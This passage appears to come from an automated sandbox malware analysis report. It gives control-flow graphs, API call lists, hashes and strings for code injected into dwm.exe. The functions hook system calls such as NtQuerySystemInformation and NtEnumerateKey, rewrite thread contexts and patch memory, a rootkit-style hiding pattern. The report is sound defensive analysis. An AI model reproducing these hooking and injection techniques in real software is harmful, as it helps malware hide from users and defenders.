                                                                                control_flow_graph 59 1160ca15b30-1160ca15b57 60 1160ca15b59-1160ca15b68 59->60 61 1160ca15b6b-1160ca15b76 GetCurrentThreadId 59->61 60->61 62 1160ca15b78-1160ca15b7d 61->62 63 1160ca15b82-1160ca15b89 61->63 64 1160ca15faf-1160ca15fc6 call 1160ca17940 62->64 65 1160ca15b9b-1160ca15baf 63->65 66 1160ca15b8b-1160ca15b96 call 1160ca15960 63->66 69 1160ca15bbe-1160ca15bc4 65->69 66->64 70 1160ca15bca-1160ca15bd3 69->70 71 1160ca15c95-1160ca15cb6 69->71 74 1160ca15c1a-1160ca15c8d call 1160ca14510 call 1160ca144b0 call 1160ca14470 70->74 75 1160ca15bd5-1160ca15c18 call 1160ca185c0 70->75 79 1160ca15cbc-1160ca15cdc GetThreadContext 71->79 80 1160ca15e1f-1160ca15e30 call 1160ca174bf 71->80 88 1160ca15c90 74->88 75->88 84 1160ca15e1a 79->84 85 1160ca15ce2-1160ca15d03 79->85 91 1160ca15e35-1160ca15e3b 80->91 84->80 85->84 90 1160ca15d09-1160ca15d12 85->90 88->69 94 1160ca15d92-1160ca15da3 90->94 95 1160ca15d14-1160ca15d25 90->95 96 1160ca15efe-1160ca15f0e 91->96 97 1160ca15e41-1160ca15e98 VirtualProtect FlushInstructionCache 91->97 103 1160ca15e15 94->103 104 1160ca15da5-1160ca15dc3 94->104 99 1160ca15d27-1160ca15d3c 95->99 100 1160ca15d8d 95->100 106 1160ca15f1e-1160ca15f2a call 1160ca14df0 96->106 107 1160ca15f10-1160ca15f17 96->107 101 1160ca15ec9-1160ca15ef9 call 1160ca178ac 97->101 102 1160ca15e9a-1160ca15ea4 97->102 99->100 109 1160ca15d3e-1160ca15d88 call 1160ca13970 SetThreadContext 99->109 100->103 101->91 102->101 110 1160ca15ea6-1160ca15ec1 call 1160ca14390 102->110 104->103 111 1160ca15dc5-1160ca15e10 call 1160ca13900 call 1160ca174dd 104->111 120 1160ca15f2f-1160ca15f35 106->120 107->106 113 1160ca15f19 call 1160ca143e0 107->113 109->100 110->101 111->103 113->106 124 1160ca15f77-1160ca15f95 120->124 125 1160ca15f37-1160ca15f75 ResumeThread call 1160ca178ac 120->125 128 1160ca15f97-1160ca15fa6 124->128 129 1160ca15fa9 124->129 125->120 128->129 129->64
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$Current$Context
                                                                                • String ID:
                                                                                • API String ID: 1666949209-0
                                                                                • Opcode ID: 2a6939216e4066241bb7d33e143ff6fb32862c5ead5fedc71a002d9303c09c17
                                                                                • Instruction ID: 43c2d2febde26202f880cb7e5d5ddc55507ed27facd1cf01b654dc556421c9b1
                                                                                • Opcode Fuzzy Hash: 2a6939216e4066241bb7d33e143ff6fb32862c5ead5fedc71a002d9303c09c17
                                                                                • Instruction Fuzzy Hash: D5D17376609B8886DB649B0AE49439AB7A0F3CCB84F140156FF8D47BA9DF3DC581CB40
                                                                                Function 000001160CA150D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 131 1160ca150d0-1160ca150fc 132 1160ca1510d-1160ca15116 131->132 133 1160ca150fe-1160ca15106 131->133 134 1160ca15127-1160ca15130 132->134 135 1160ca15118-1160ca15120 132->135 133->132 136 1160ca15141-1160ca1514a 134->136 137 1160ca15132-1160ca1513a 134->137 135->134 138 1160ca15156-1160ca15161 GetCurrentThreadId 136->138 139 1160ca1514c-1160ca15151 136->139 137->136 141 1160ca1516d-1160ca15174 138->141 142 1160ca15163-1160ca15168 138->142 140 1160ca156d3-1160ca156da 139->140 143 1160ca15176-1160ca1517c 141->143 144 1160ca15181-1160ca1518a 141->144 142->140 143->140 145 1160ca15196-1160ca151a2 144->145 146 1160ca1518c-1160ca15191 144->146 147 1160ca151ce-1160ca15225 call 1160ca156e0 * 2 145->147 148 1160ca151a4-1160ca151c9 145->148 146->140 153 1160ca15227-1160ca1522e 147->153 154 1160ca1523a-1160ca15243 147->154 148->140 155 1160ca15236 153->155 156 1160ca15230 153->156 157 1160ca15255-1160ca1525e 154->157 158 1160ca15245-1160ca15252 154->158 162 1160ca152a6-1160ca152aa 155->162 161 1160ca152b0-1160ca152b6 156->161 159 1160ca15260-1160ca15270 157->159 160 1160ca15273-1160ca15298 call 1160ca17870 157->160 158->157 159->160 170 1160ca1532d-1160ca15342 call 1160ca13cc0 160->170 171 1160ca1529e 160->171 164 1160ca152b8-1160ca152d4 call 1160ca14390 161->164 165 1160ca152e5-1160ca152eb 161->165 162->161 164->165 175 1160ca152d6-1160ca152de 164->175 168 1160ca152ed-1160ca1530c call 1160ca178ac 165->168 169 1160ca15315-1160ca15328 165->169 168->169 169->140 178 1160ca15351-1160ca1535a 170->178 179 1160ca15344-1160ca1534c 170->179 171->162 175->165 180 1160ca1536c-1160ca153ba call 1160ca18c60 178->180 181 1160ca1535c-1160ca15369 178->181 179->162 184 1160ca153c2-1160ca153ca 180->184 181->180 185 1160ca154d7-1160ca154df 184->185 186 1160ca153d0-1160ca154bb call 1160ca17440 184->186 187 1160ca154e1-1160ca154f4 call 1160ca14590 185->187 188 1160ca15523-1160ca1552b 185->188 198 1160ca154bd 186->198 199 1160ca154bf-1160ca154ce call 1160ca14060 186->199 203 1160ca154f6 187->203 204 1160ca154f8-1160ca15521 187->204 191 1160ca15537-1160ca15546 188->191 192 1160ca1552d-1160ca15535 188->192 196 1160ca15548 191->196 197 1160ca1554f 191->197 192->191 195 1160ca15554-1160ca15561 192->195 201 1160ca15563 195->201 202 1160ca15564-1160ca155b9 call 1160ca185c0 195->202 196->197 197->195 198->185 207 1160ca154d0 199->207 208 1160ca154d2 199->208 201->202 210 1160ca155c8-1160ca15661 call 1160ca14510 call 1160ca14470 VirtualProtect 202->210 211 1160ca155bb-1160ca155c3 202->211 203->188 204->185 207->185 208->184 216 1160ca15671-1160ca156d1 210->216 217 1160ca15663-1160ca15668 GetLastError 210->217 216->140 217->216
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: ab42e8011698989dde6dd516e0bf8dfd7e718f101fabf5710552cbfe92ec9bd4
                                                                                • Instruction ID: 2f876bf7158a6cc8c63e08690c226b7ead55a405f44d1cff1c0479b88e861e6f
                                                                                • Opcode Fuzzy Hash: ab42e8011698989dde6dd516e0bf8dfd7e718f101fabf5710552cbfe92ec9bd4
                                                                                • Instruction Fuzzy Hash: 6602B632619B8486EBA4CB59E49439AB7A1F3C9794F104055FF8E87BA8DF7DC484CB00
                                                                                Function 000001160CA139E0 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$AllocQuery
                                                                                • String ID:
                                                                                • API String ID: 31662377-0
                                                                                • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                                • Instruction ID: 62f04f5f668187a0ae4209a96062c236bbf9041d91d4252b03df27feef77b1b0
                                                                                • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                                • Instruction Fuzzy Hash: 4131BC3221AB8881EF689A19E0553DE66E4F38C784F500565BFCD46BACDB6FC5C08B44
                                                                                Function 000001160CA1328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                • String ID:
                                                                                • API String ID: 1683269324-0
                                                                                • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction ID: eb769cf37a89b3ef12196dc5b3cb94eded2092a35d1ffa07bd756d036b65c0b3
                                                                                • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction Fuzzy Hash: B511927161678086FF6C9F6AF8597D92294B75C344F5082A4FF16815BDEF7BC0C88204
                                                                                Function 000001160CA14DF0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 3733156554-0
                                                                                • Opcode ID: 7a47e93f7e79f9067e4e2fc8604941f3a9ad20237d3497da51ea1a98359c40d4
                                                                                • Instruction ID: 72fb3dffb222cd1b70a4713ad25575b3f8e9ea29d6d58944361b524033167b4a
                                                                                • Opcode Fuzzy Hash: 7a47e93f7e79f9067e4e2fc8604941f3a9ad20237d3497da51ea1a98359c40d4
                                                                                • Instruction Fuzzy Hash: 36F0B736218B0480D7359B0AE4517DAABA0E38CBD4F145155BF8D47BADCA3EC6D18B40
                                                                                Function 000001160C9E273C Relevance: 3.2, APIs: 2, Instructions: 187memorylibraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 265 1160c9e273c-1160c9e27a4 call 1160c9e29d4 * 4 274 1160c9e29b2 265->274 275 1160c9e27aa-1160c9e27ad 265->275 277 1160c9e29b4-1160c9e29d0 274->277 275->274 276 1160c9e27b3-1160c9e27b6 275->276 276->274 278 1160c9e27bc-1160c9e27bf 276->278 278->274 279 1160c9e27c5-1160c9e27e6 VirtualAlloc 278->279 279->274 280 1160c9e27ec-1160c9e280c 279->280 281 1160c9e280e-1160c9e2836 280->281 282 1160c9e2838-1160c9e283f 280->282 281->281 281->282 283 1160c9e2845-1160c9e2852 282->283 284 1160c9e28df-1160c9e28e6 282->284 283->284 287 1160c9e2858-1160c9e286a LoadLibraryA 283->287 285 1160c9e2992-1160c9e29b0 284->285 286 1160c9e28ec-1160c9e2901 284->286 285->277 286->285 288 1160c9e2907 286->288 289 1160c9e286c-1160c9e2878 287->289 290 1160c9e28ca-1160c9e28d2 287->290 293 1160c9e290d-1160c9e2921 288->293 294 1160c9e28c5-1160c9e28c8 289->294 290->287 291 1160c9e28d4-1160c9e28d9 290->291 291->284 296 1160c9e2982-1160c9e298c 293->296 297 1160c9e2923-1160c9e2934 293->297 294->290 295 1160c9e287a-1160c9e287d 294->295 301 1160c9e287f-1160c9e28a5 295->301 302 1160c9e28a7-1160c9e28b7 295->302 296->285 296->293 299 1160c9e293f-1160c9e2943 297->299 300 1160c9e2936-1160c9e293d 297->300 304 1160c9e2945-1160c9e294b 299->304 305 1160c9e294d-1160c9e2951 299->305 303 1160c9e2970-1160c9e2980 300->303 306 1160c9e28ba-1160c9e28c1 301->306 302->306 303->296 303->297 304->303 308 1160c9e2963-1160c9e2967 305->308 309 1160c9e2953-1160c9e2961 305->309 306->294 308->303 310 1160c9e2969-1160c9e296c 308->310 309->303 310->303
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415177632.000001160C9E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160C9E0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160c9e0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: AllocLibraryLoadVirtual
                                                                                • String ID:
                                                                                • API String ID: 3550616410-0
                                                                                • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction ID: 14d0a45b7d66c6113b95179a3941541b290b58f9ebcf81554cf017b6ede3d357
                                                                                • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction Fuzzy Hash: BB611372B01B9087EB58CF15D1407EDB3AAFB68BA4F589161EF590778CEA39D852C700
                                                                                Function 000001160CA11ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 000001160CA11628: GetProcessHeap.KERNEL32 ref: 000001160CA11633
                                                                                  • Part of subcall function 000001160CA11628: HeapAlloc.KERNEL32 ref: 000001160CA11642
                                                                                  • Part of subcall function 000001160CA11628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA116B2
                                                                                  • Part of subcall function 000001160CA11628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA116DF
                                                                                  • Part of subcall function 000001160CA11628: RegCloseKey.ADVAPI32 ref: 000001160CA116F9
                                                                                  • Part of subcall function 000001160CA11628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA11719
                                                                                  • Part of subcall function 000001160CA11628: RegCloseKey.ADVAPI32 ref: 000001160CA11734
                                                                                  • Part of subcall function 000001160CA11628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA11754
                                                                                  • Part of subcall function 000001160CA11628: RegCloseKey.ADVAPI32 ref: 000001160CA1176F
                                                                                  • Part of subcall function 000001160CA11628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA1178F
                                                                                  • Part of subcall function 000001160CA11628: RegCloseKey.ADVAPI32 ref: 000001160CA117AA
                                                                                  • Part of subcall function 000001160CA11628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA117CA
                                                                                • Sleep.KERNEL32 ref: 000001160CA11AD7
                                                                                • SleepEx.KERNELBASE ref: 000001160CA11ADD
                                                                                  • Part of subcall function 000001160CA11628: RegCloseKey.ADVAPI32 ref: 000001160CA117E5
                                                                                  • Part of subcall function 000001160CA11628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA11805
                                                                                  • Part of subcall function 000001160CA11628: RegCloseKey.ADVAPI32 ref: 000001160CA11820
                                                                                  • Part of subcall function 000001160CA11628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA11840
                                                                                  • Part of subcall function 000001160CA11628: RegCloseKey.ADVAPI32 ref: 000001160CA1185B
                                                                                  • Part of subcall function 000001160CA11628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA1187B
                                                                                  • Part of subcall function 000001160CA11628: RegCloseKey.ADVAPI32 ref: 000001160CA11896
                                                                                  • Part of subcall function 000001160CA11628: RegCloseKey.ADVAPI32 ref: 000001160CA118A0
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1534210851-0
                                                                                • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction ID: def476aa2106e92d5e83f68997f758a87603729eedac3282fb672689b4480aed
                                                                                • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction Fuzzy Hash: A031E37120474581FF589B2ED6513ED63A6AB8CBD0F0855A1BF09876EDFE1AC9D1C210

                                                                                Non-executed Functions

                                                                                Function 000001160CA12B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 575 1160ca12b2c-1160ca12ba5 call 1160ca32ce0 578 1160ca12bab-1160ca12bb1 575->578 579 1160ca12ee0-1160ca12f03 575->579 578->579 580 1160ca12bb7-1160ca12bba 578->580 580->579 581 1160ca12bc0-1160ca12bc3 580->581 581->579 582 1160ca12bc9-1160ca12bd9 GetModuleHandleA 581->582 583 1160ca12bdb-1160ca12beb call 1160ca26090 582->583 584 1160ca12bed 582->584 585 1160ca12bf0-1160ca12c0e 583->585 584->585 585->579 589 1160ca12c14-1160ca12c33 StrCmpNIW 585->589 589->579 590 1160ca12c39-1160ca12c3d 589->590 590->579 591 1160ca12c43-1160ca12c4d 590->591 591->579 592 1160ca12c53-1160ca12c5a 591->592 592->579 593 1160ca12c60-1160ca12c73 592->593 594 1160ca12c83 593->594 595 1160ca12c75-1160ca12c81 593->595 596 1160ca12c86-1160ca12c8a 594->596 595->596 597 1160ca12c9a 596->597 598 1160ca12c8c-1160ca12c98 596->598 599 1160ca12c9d-1160ca12ca7 597->599 598->599 600 1160ca12d9d-1160ca12da1 599->600 601 1160ca12cad-1160ca12cb0 599->601 604 1160ca12da7-1160ca12daa 600->604 605 1160ca12ed2-1160ca12eda 600->605 602 1160ca12cc2-1160ca12ccc 601->602 603 1160ca12cb2-1160ca12cbf call 1160ca1199c 601->603 607 1160ca12cce-1160ca12cdb 602->607 608 1160ca12d00-1160ca12d0a 602->608 603->602 609 1160ca12dbb-1160ca12dc5 604->609 610 1160ca12dac-1160ca12db8 call 1160ca1199c 604->610 605->579 605->593 607->608 614 1160ca12cdd-1160ca12cea 607->614 615 1160ca12d3a-1160ca12d3d 608->615 616 1160ca12d0c-1160ca12d19 608->616 611 1160ca12dc7-1160ca12dd4 609->611 612 1160ca12df5-1160ca12df8 609->612 610->609 611->612 618 1160ca12dd6-1160ca12de3 611->618 619 1160ca12dfa-1160ca12e03 call 1160ca11bbc 612->619 620 1160ca12e05-1160ca12e12 lstrlenW 612->620 621 1160ca12ced-1160ca12cf3 614->621 623 1160ca12d4b-1160ca12d58 lstrlenW 615->623 624 1160ca12d3f-1160ca12d49 call 1160ca11bbc 615->624 616->615 622 1160ca12d1b-1160ca12d28 616->622 627 1160ca12de6-1160ca12dec 618->627 619->620 637 1160ca12e4a-1160ca12e55 619->637 633 1160ca12e35-1160ca12e3f call 1160ca13844 620->633 634 1160ca12e14-1160ca12e1e 620->634 631 1160ca12cf9-1160ca12cfe 621->631 632 1160ca12d93-1160ca12d98 621->632 635 1160ca12d2b-1160ca12d31 622->635 628 1160ca12d7b-1160ca12d8d call 1160ca13844 623->628 629 1160ca12d5a-1160ca12d64 623->629 624->623 624->632 627->637 638 1160ca12dee-1160ca12df3 627->638 628->632 642 1160ca12e42-1160ca12e44 628->642 629->628 639 1160ca12d66-1160ca12d79 call 1160ca1152c 629->639 631->608 631->621 632->642 633->642 634->633 643 1160ca12e20-1160ca12e33 call 1160ca1152c 634->643 635->632 644 1160ca12d33-1160ca12d38 635->644 647 1160ca12e57-1160ca12e5b 637->647 648 1160ca12ecc-1160ca12ed0 637->648 638->612 638->627 639->628 639->632 642->605 642->637 643->633 643->637 644->615 644->635 652 1160ca12e5d-1160ca12e61 647->652 653 1160ca12e63-1160ca12e7d call 1160ca185c0 647->653 648->605 652->653 656 1160ca12e80-1160ca12e83 652->656 653->656 659 1160ca12ea6-1160ca12ea9 656->659 660 1160ca12e85-1160ca12ea3 call 1160ca185c0 656->660 659->648 662 1160ca12eab-1160ca12ec9 call 1160ca185c0 659->662 660->659 662->648
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                • API String ID: 2119608203-3850299575
                                                                                • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                • Instruction ID: 26e0d04264bd1025ab8084d08883fea5ee137d09c7f6383246fa8a543dd74820
                                                                                • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                • Instruction Fuzzy Hash: 70B16972220B9086EB6D8F29D4507E967A5FB88B94F445296FF0993799EF36CCC0C340
                                                                                Function 000001160CA17D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 3140674995-0
                                                                                • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction ID: f38edc99e1d2e9b9c73a0df7d4b367b2acc15f75f327f8aa4a1b2c45b403be39
                                                                                • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction Fuzzy Hash: 83318372205B808AEB649F65E8503ED73B0F788744F44406AEF4D57B98EF39CA88C710
                                                                                Function 000001160CA1D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 1239891234-0
                                                                                • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction ID: 5919553aac9d1a8d8787ae4c55b550eb79f0a7f4b7b5ddd794635620a42e0337
                                                                                • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction Fuzzy Hash: 98314936614B8086EB648F29E8903EE73A4F789758F500166FF9D43B99EF39C585CB00
                                                                                Function 000001160CA112BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                • String ID: d
                                                                                • API String ID: 2005889112-2564639436
                                                                                • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction ID: 62386f3898b506f272a71971f8396644ea8b68a147205f6dc5b3694ce09630a9
                                                                                • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction Fuzzy Hash: F7513776205B9486EB58CF6AE4583DAB7A1F788F99F448124EF4A07718DF39D489CB00
                                                                                Function 000001160CA11D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                • API String ID: 4175298099-1975688563
                                                                                • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction ID: d0e5114047ee53141e5c98024223ea41aaf4f9b0c9cd1fbc05652697f2aefcd5
                                                                                • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction Fuzzy Hash: 5C318274500B5AA0EB0CEB6EE8717D46321B74C344F905593BF094256EDE3AC6C9C350
                                                                                Function 000001160C9E6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 417 1160c9e6910-1160c9e6916 418 1160c9e6951-1160c9e695b 417->418 419 1160c9e6918-1160c9e691b 417->419 420 1160c9e6a78-1160c9e6a8d 418->420 421 1160c9e6945-1160c9e6984 call 1160c9e6fc0 419->421 422 1160c9e691d-1160c9e6920 419->422 426 1160c9e6a8f 420->426 427 1160c9e6a9c-1160c9e6ab6 call 1160c9e6e54 420->427 437 1160c9e6a52 421->437 438 1160c9e698a-1160c9e699f call 1160c9e6e54 421->438 424 1160c9e6922-1160c9e6925 422->424 425 1160c9e6938 __scrt_dllmain_crt_thread_attach 422->425 429 1160c9e6931-1160c9e6936 call 1160c9e6f04 424->429 430 1160c9e6927-1160c9e6930 424->430 433 1160c9e693d-1160c9e6944 425->433 431 1160c9e6a91-1160c9e6a9b 426->431 440 1160c9e6aef-1160c9e6b20 call 1160c9e7190 427->440 441 1160c9e6ab8-1160c9e6aed call 1160c9e6f7c call 1160c9e6e1c call 1160c9e7318 call 1160c9e7130 call 1160c9e7154 call 1160c9e6fac 427->441 429->433 443 1160c9e6a54-1160c9e6a69 437->443 450 1160c9e69a5-1160c9e69b6 call 1160c9e6ec4 438->450 451 1160c9e6a6a-1160c9e6a77 call 1160c9e7190 438->451 452 1160c9e6b22-1160c9e6b28 440->452 453 1160c9e6b31-1160c9e6b37 440->453 441->431 470 1160c9e69b8-1160c9e69dc call 1160c9e72dc call 1160c9e6e0c call 1160c9e6e38 call 1160c9eac0c 450->470 471 1160c9e6a07-1160c9e6a11 call 1160c9e7130 450->471 451->420 452->453 454 1160c9e6b2a-1160c9e6b2c 452->454 455 1160c9e6b7e-1160c9e6b94 call 1160c9e268c 453->455 456 1160c9e6b39-1160c9e6b43 453->456 460 1160c9e6c1f-1160c9e6c2c 454->460 478 1160c9e6bcc-1160c9e6bce 455->478 479 1160c9e6b96-1160c9e6b98 455->479 461 1160c9e6b45-1160c9e6b4d 456->461 462 1160c9e6b4f-1160c9e6b5d call 1160c9f5780 456->462 467 1160c9e6b63-1160c9e6b78 call 1160c9e6910 461->467 462->467 482 1160c9e6c15-1160c9e6c1d 462->482 467->455 467->482 470->471 520 1160c9e69de-1160c9e69e5 __scrt_dllmain_after_initialize_c 470->520 471->437 491 1160c9e6a13-1160c9e6a1f call 1160c9e7180 471->491 480 1160c9e6bd5-1160c9e6bea call 1160c9e6910 478->480 481 1160c9e6bd0-1160c9e6bd3 478->481 479->478 487 1160c9e6b9a-1160c9e6bbc call 1160c9e268c call 1160c9e6a78 479->487 480->482 501 1160c9e6bec-1160c9e6bf6 480->501 481->480 481->482 482->460 487->478 512 1160c9e6bbe-1160c9e6bc6 call 1160c9f5780 487->512 509 1160c9e6a45-1160c9e6a50 491->509 510 1160c9e6a21-1160c9e6a2b call 1160c9e7098 491->510 506 1160c9e6c01-1160c9e6c11 call 1160c9f5780 501->506 507 1160c9e6bf8-1160c9e6bff 501->507 506->482 507->482 509->443 510->509 519 1160c9e6a2d-1160c9e6a3b 510->519 512->478 519->509 520->471 521 1160c9e69e7-1160c9e6a04 call 